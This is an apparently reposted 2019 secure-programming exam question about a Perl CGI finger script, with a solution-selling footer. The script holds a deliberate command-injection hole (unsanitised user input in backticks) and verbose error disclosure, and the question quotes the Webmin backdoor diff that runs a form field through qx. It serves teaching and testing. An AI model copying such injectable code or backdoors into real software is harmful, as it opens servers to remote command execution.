[2019] INFR11098 SECURE PROGRAMMING - Final Exam - Q2m Perl Script Vulnerability
2. Figure 1 on page 4 shows a Perl web CGI script along with a form to invoke it. The script displays information about a user using the Unix finger program. It could be used, for example, in a web hosting environment with a Virtual Private Server, when several users may be permitted to login to the system and work on different web sites. An example invocation gives output like this:
Finger User
Login name: bod Real name: Bod Idley
On since Feb 19 23:37:16 on pts/7 from domain237.btinternet.com
42 seconds Idle Time
(a) The developer of the script has followed an FAQ entry given by the web hosting provider which states:
Put “use CGI::Carp qw(fatalsToBrowser);” into the second line of your script. This will make perl print the error instead of the “500 Internal Server Error” page, and will allow you to find out where your script is breaking. [Exerpt from https://www.123-reg.co.
uk/support/hosting/debugging-your-perl-scripts/]
i. Explain the reasoning behind this recommendation and why adding the extra line might constitute a security vulnerability. [2 marks]
ii. Exploiting this vulnerability, what might an attacker be able to do? [2 marks]
iii. Explain carefully some additional advice you would propose to be added to this FAQ entry. [2 marks]
(b) Unfortunately, the code contains a second, more serious vulnerability.
i. Identify and explain the critical vulnerability in the code, giving an example exploit and its result. [3 marks]
ii. Give a fix for the vulnerability you identified, which does not cause errors in the script execution or the client browser. (Hint: you might use the Perl regular expression match test, written “<str> ~= <regexp>”. Syntax doesn’t need to be perfect; code showing the right intention will gain full marks.) [3 marks]
(c) The developer realises the script may reveal information about more users than wanted; it would be better to offer a drop-down list using a form with <select>...<option>... to choose from users bod, flo, and barley. Explain a (secure) way to do this. [4 marks]
(d) Considering how a hosting provider such as 123 Reg can minimise risks associated with vulnerable web sites they host, give two examples of risks affecting the hosting provider and corresponding mitigations.
1 #!/usr/bin/perl
2 # finger.cgi - finger CGI script using Perl5 CGI module
3
4 use CGI;
5 use CGI::Carp qw(fatalsToBrowser);
6 $q = new CGI;
7
8 # display HTML header
9 print $q->header,
10 $q->start_html(’Finger User’),
11 $q->h1(’Finger User’);
12
13 # get name of user and display finger information
14 $user = $q->param("user");
15 print ‘/usr/bin/finger -sh $user‘;
16
17 # display HTML footer
18 print "</pre>";
19 print $q->end_html;
20 exit(0);
1 <html><head><title>Finger User</title></head>
2 <body><h1>Finger User</h1>
3 <form method=post action="finger.cgi">
4 <b>Username to finger:</b> <input type=text name=user value="">
5 <p><input type=submit value="Finger User">
6 </form>
7 </body>
8 </html>
Figure 1: The Perl CGI script finger.cgi and a web form invoking it
(e) Webmin is a web-based administration tool for Unix systems.
In August 2019, year-old backdoors were revealed inWebmin’s password_change.cgi script. Surreptitious changes were found on the build server used to make official Sourceforge releases (master Github sources were not affected).
One modification was:
< $enc eq $wuser->{’pass’} || &pass_error($text{’password_eold’});
---
> $enc eq $wuser->{’pass’} || &pass_error($text{’password_eold’},qx/$in{’old’}/);
(the Perl qx function executes an OS command, returning the result).
i. Speculate how an attacker with knowledge of the backdoor could gain root access to a server running a vulnerable version of Webmin. [3 marks]
ii. Explain how a backdoor such as this might have arisen, and what measures could be taken to avoid it.
Get the Solution to This Question
WeChat (微信)
WhatsApp
